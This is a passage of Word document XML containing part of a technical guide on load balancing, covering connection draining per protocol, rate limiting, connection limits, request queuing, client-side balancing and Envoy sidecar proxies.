      <w:r w:rsidRPr="00F15BD1">
        <w:t>EXISTING connections continue until they complete naturally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E144C41" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A timeout enforces maximum drain time (e.g., 30 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE33D3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>After all connections complete (or timeout), the backend is fully removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD71A2A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.2 How Draining Works at the Protocol Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913A87B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For HTTP/1.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42334DC0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB stops adding new requests to the backend's connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A9B23" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Waits for in-flight responses to return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E6621" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>After response is sent to client, the connection is closed (via Connection: close header or FIN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480E6B7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For HTTP/2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FD585" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB sends a GOAWAY frame to the backend (signals: "no new streams, finish existing ones").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F1D65" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend completes in-flight streams, then closes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16276983" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For WebSockets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01077473" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB sends a Close frame (code 1001: "Going Away").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B198D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client can reconnect (to a different backend, selected by LB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DFEB6C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For long-lived connections (streaming, gRPC streaming):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357723A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Draining timeout is critical. A never-ending stream will hold the connection forever without a timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5F116" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Must balance: long enough for reasonable requests, short enough that deployments don't stall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEC6EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="40130C59">
          <v:rect id="_x0000_i2680" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1C478" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Rate Limiting and Traffic Shaping at the Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3AF1AF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Per-Client Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19568D7F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works at the LB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F04E0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB tracks requests per client (identified by IP, API key, or header):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEAC0A5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client sends request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED476A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB looks up client's current rate counter (stored in shared memory or distributed store).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D9A6AB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If under limit → forward to backend, increment counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBBCF1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>If over limit → return HTTP 429 (Too Many Requests) with Retry-After header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC6D0E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why at the LB (not at the backend):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D205D2B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Rejects abusive traffic BEFORE it reaches backends (protects backend resources).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA32577" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Centralized enforcement (a client hitting multiple backends still sees one unified rate limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1472F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB has global visibility across all backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74A0C8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Connection Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448CFCE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Max connections per backend:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Prevents overwhelming a single server. If the limit is reached, new requests queue at the LB or go to other backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858DFAF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Max connections per client:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Prevents one client from consuming all backend connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A3236" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global connection limit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Protects the LB itself from memory exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B52233" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Request Queuing (Traffic Buffering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDDD8A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When all backends are at capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758B6E5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Option 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reject immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> (HTTP 503). Fast failure, client can retry. Option 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue at the LB.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Hold requests in a buffer. As backends free up, dispatch from the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D5F23" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Queue details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE78393" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Maximum queue size (prevent unbounded memory growth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF91A4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Maximum queue time (a request waiting &gt;10s is useless — the client has probably timed out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19732882" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LIFO vs FIFO: LIFO (Last-In-First-Out) can be better because older requests have likely already timed out on the client side. Serving the newest request is more likely to produce a useful response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5B44D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="35CD98E9">
          <v:rect id="_x0000_i2681" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1442ED34" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Service Mesh and Modern Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692A7D9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Client-Side Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E265F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traditional (server-side LB):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Client → LB → Backend. The LB is a separate hop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252CBA0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Client-side LB:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> The client itself knows all available backends and chooses one directly. No intermediate hop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A8D0B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1C99E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client queries a service registry (Consul, etcd, Kubernetes API) for available instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72009E71" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client caches the instance list locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB528F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For each request, client applies a load balancing algorithm locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2AF504" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client sends request directly to chosen backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0675B7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DED077" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No extra network hop (lower latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F016C2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No centralized LB bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5ECCA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client can use sophisticated algorithms (least latency with local measurements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79D2D5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99F9DC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client library must be implemented in every language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01136DE1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Harder to update balancing logic (must redeploy all clients).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616AF514" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client must handle health checking, failure detection itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48DDC7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> gRPC (built-in LB), Netflix Ribbon/Eureka, Finagle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0970F49C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Sidecar Proxy (Service Mesh) — The Best of Both Worlds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64CBEE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works (Envoy sidecar):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF03956" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Every service instance has an Envoy proxy running alongside it (sidecar pattern in Kubernetes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D463D8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>All outbound traffic from the service goes through its local Envoy (on localhost — negligible latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0739DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Envoy handles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53440923" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Service discovery (queries control plane for available backends).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F578F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Load balancing (least requests, round robin, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EEC9A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Health checking.</w:t>
      </w:r>
    </w:p>
